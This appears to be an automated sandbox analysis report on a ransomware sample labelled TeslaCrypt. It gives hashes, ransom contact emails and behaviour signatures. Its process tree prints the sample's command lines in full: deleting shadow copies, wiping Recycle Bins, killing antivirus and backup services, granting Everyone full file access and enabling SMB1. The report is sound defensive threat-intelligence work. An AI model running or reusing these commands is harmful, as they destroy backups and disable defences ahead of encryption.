Analysis
-
max time kernel
109s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
22-01-2021 08:01
Static task
static1
Behavioral task
behavioral1
Sample
GZTJoxx.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
GZTJoxx.exe
Resource
win10v20201028
General
-
Target
GZTJoxx.exe
-
Size
88KB
-
MD5
19f207b20b1d2a05aba1a1eb59da54d2
-
SHA1
8d75108ec34fd79f8336041d5ff31443cc527add
-
SHA256
8e775324fc69a677394cf6d079d1d45bf53af10acd683bda53e5f86a8a192393
-
SHA512
6a6b97e5f4543437270628af70a67e51a32d1ad9afbc0f19611d0131d9e84154f8525e3aeeb41c82f1c4437694be898b7ef520ac8eddf9b227f3d1013e57f749
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
workplus111@protonmail.com
worker400@airmail.cc
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
workplus111@protonmail.com
worker400@airmail.cc
Signatures
-
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
-
Executes dropped EXE 1 IoCs
Processes:
wqm58yk7.exepid process 2492 wqm58yk7.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
wqm58yk7.exedescription ioc process File renamed C:\Users\Admin\Pictures\RestoreClose.tiff => C:\Users\Admin\Pictures\RestoreClose.tiff.0l0lqq wqm58yk7.exe File opened for modification C:\Users\Admin\Pictures\RestoreClose.tiff wqm58yk7.exe -
Drops startup file 1 IoCs
Processes:
wqm58yk7.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk wqm58yk7.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 11336 icacls.exe 11476 icacls.exe 7412 icacls.exe -
Processes:
wqm58yk7.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features wqm58yk7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" wqm58yk7.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 8952 taskkill.exe 8920 taskkill.exe 8856 taskkill.exe 8744 taskkill.exe 9120 taskkill.exe 9032 taskkill.exe 8968 taskkill.exe 8816 taskkill.exe 8688 taskkill.exe 9008 taskkill.exe 8904 taskkill.exe 8832 taskkill.exe 8760 taskkill.exe 8728 taskkill.exe 8712 taskkill.exe 8648 taskkill.exe 8624 taskkill.exe 3312 taskkill.exe 8880 taskkill.exe 8840 taskkill.exe 8984 taskkill.exe 8808 taskkill.exe 8784 taskkill.exe 8768 taskkill.exe 9096 taskkill.exe 9080 taskkill.exe 9040 taskkill.exe 8600 taskkill.exe 8896 taskkill.exe 8720 taskkill.exe 8640 taskkill.exe 6984 taskkill.exe 8872 taskkill.exe 8696 taskkill.exe 8616 taskkill.exe 8396 taskkill.exe 9016 taskkill.exe 8992 taskkill.exe 10808 taskkill.exe 8664 taskkill.exe 9064 taskkill.exe 8928 taskkill.exe 8672 taskkill.exe 8944 taskkill.exe 8792 taskkill.exe 8224 taskkill.exe 9136 taskkill.exe 11160 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 9656 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
wqm58yk7.exepid process 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe 2492 wqm58yk7.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
wqm58yk7.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 2492 wqm58yk7.exe Token: SeDebugPrivilege 3292 powershell.exe Token: SeDebugPrivilege 3312 taskkill.exe Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 8616 taskkill.exe Token: SeDebugPrivilege 8696 taskkill.exe Token: SeDebugPrivilege 8784 taskkill.exe Token: SeDebugPrivilege 8744 taskkill.exe Token: SeDebugPrivilege 8872 taskkill.exe Token: SeDebugPrivilege 8984 taskkill.exe Token: SeDebugPrivilege 8968 taskkill.exe Token: SeDebugPrivilege 8672 taskkill.exe Token: SeDebugPrivilege 8664 taskkill.exe Token: SeDebugPrivilege 8952 taskkill.exe Token: SeDebugPrivilege 8728 taskkill.exe Token: SeDebugPrivilege 9016 taskkill.exe Token: SeDebugPrivilege 11160 taskkill.exe Token: SeDebugPrivilege 8880 taskkill.exe Token: SeDebugPrivilege 8688 taskkill.exe Token: SeDebugPrivilege 8224 taskkill.exe Token: SeDebugPrivilege 8624 taskkill.exe Token: SeDebugPrivilege 9096 taskkill.exe Token: SeDebugPrivilege 8896 taskkill.exe Token: SeDebugPrivilege 8648 taskkill.exe Token: SeDebugPrivilege 8768 taskkill.exe Token: SeDebugPrivilege 8712 taskkill.exe Token: SeDebugPrivilege 8816 taskkill.exe Token: SeDebugPrivilege 8928 taskkill.exe Token: SeDebugPrivilege 8396 taskkill.exe Token: SeDebugPrivilege 8600 taskkill.exe Token: SeDebugPrivilege 8856 taskkill.exe Token: SeDebugPrivilege 8920 taskkill.exe Token: SeDebugPrivilege 8640 taskkill.exe Token: SeDebugPrivilege 8792 taskkill.exe Token: SeDebugPrivilege 8992 taskkill.exe Token: SeDebugPrivilege 10808 taskkill.exe Token: SeDebugPrivilege 8832 taskkill.exe Token: SeDebugPrivilege 9120 taskkill.exe Token: SeDebugPrivilege 8720 taskkill.exe Token: SeDebugPrivilege 8904 taskkill.exe Token: SeDebugPrivilege 9064 taskkill.exe Token: SeDebugPrivilege 9080 taskkill.exe Token: SeDebugPrivilege 8944 taskkill.exe Token: SeDebugPrivilege 8760 taskkill.exe Token: SeDebugPrivilege 9032 taskkill.exe Token: SeDebugPrivilege 9136 taskkill.exe Token: SeDebugPrivilege 9008 taskkill.exe Token: SeDebugPrivilege 6984 taskkill.exe Token: SeDebugPrivilege 8840 taskkill.exe Token: SeDebugPrivilege 9040 taskkill.exe Token: SeDebugPrivilege 6384 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
wqm58yk7.exepid process 2492 wqm58yk7.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
wqm58yk7.exepid process 2492 wqm58yk7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
GZTJoxx.exewqm58yk7.exedescription pid process target process PID 988 wrote to memory of 2492 988 GZTJoxx.exe wqm58yk7.exe PID 988 wrote to memory of 2492 988 GZTJoxx.exe wqm58yk7.exe PID 988 wrote to memory of 2492 988 GZTJoxx.exe wqm58yk7.exe PID 2492 wrote to memory of 3292 2492 wqm58yk7.exe powershell.exe PID 2492 wrote to memory of 3292 2492 wqm58yk7.exe powershell.exe PID 2492 wrote to memory of 3292 2492 wqm58yk7.exe powershell.exe PID 2492 wrote to memory of 3312 2492 wqm58yk7.exe taskkill.exe PID 2492 wrote to memory of 3312 2492 wqm58yk7.exe taskkill.exe PID 2492 wrote to memory of 3312 2492 wqm58yk7.exe taskkill.exe PID 2492 wrote to memory of 2496 2492 wqm58yk7.exe reg.exe PID 2492 wrote to memory of 2496 2492 wqm58yk7.exe reg.exe PID 2492 wrote to memory of 2496 2492 wqm58yk7.exe reg.exe PID 2492 wrote to memory of 1080 2492 wqm58yk7.exe reg.exe PID 2492 wrote to memory of 1080 2492 wqm58yk7.exe reg.exe PID 2492 wrote to memory of 1080 2492 wqm58yk7.exe reg.exe PID 2492 wrote to memory of 3884 2492 wqm58yk7.exe schtasks.exe PID 2492 wrote to memory of 3884 2492 wqm58yk7.exe schtasks.exe PID 2492 wrote to memory of 3884 2492 wqm58yk7.exe schtasks.exe PID 2492 wrote to memory of 1392 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 1392 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 1392 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 2992 2492 wqm58yk7.exe cmd.exe PID 2492 wrote to memory of 2992 2492 wqm58yk7.exe cmd.exe PID 2492 wrote to memory of 2992 2492 wqm58yk7.exe cmd.exe PID 2492 wrote to memory of 3040 2492 wqm58yk7.exe cmd.exe PID 2492 wrote to memory of 3040 2492 wqm58yk7.exe cmd.exe PID 2492 wrote to memory of 3040 2492 wqm58yk7.exe cmd.exe PID 2492 wrote to memory of 3968 2492 wqm58yk7.exe netsh.exe PID 2492 wrote to memory of 3968 2492 wqm58yk7.exe netsh.exe PID 2492 wrote to memory of 3968 2492 wqm58yk7.exe netsh.exe PID 2492 wrote to memory of 3288 2492 wqm58yk7.exe netsh.exe PID 2492 wrote to memory of 3288 2492 wqm58yk7.exe netsh.exe PID 2492 wrote to memory of 3288 2492 wqm58yk7.exe netsh.exe PID 2492 wrote to memory of 3044 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 3044 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 3044 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 3960 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 3960 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 3960 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 2100 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 2100 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 2100 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 1880 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 1880 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 1880 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 2112 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 2112 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 2112 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 4124 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 4124 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 4124 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 4160 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 4160 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 4160 2492 wqm58yk7.exe sc.exe PID 2492 wrote to memory of 4240 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4240 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4240 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4264 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4264 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4264 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4296 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4296 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4296 2492 wqm58yk7.exe net.exe PID 2492 wrote to memory of 4328 2492 wqm58yk7.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
wqm58yk7.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" wqm58yk7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" wqm58yk7.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\GZTJoxx.exe"C:\Users\Admin\AppData\Local\Temp\GZTJoxx.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto3⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol3⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y4⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\arp.exe"arp" -a3⤵
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵
-
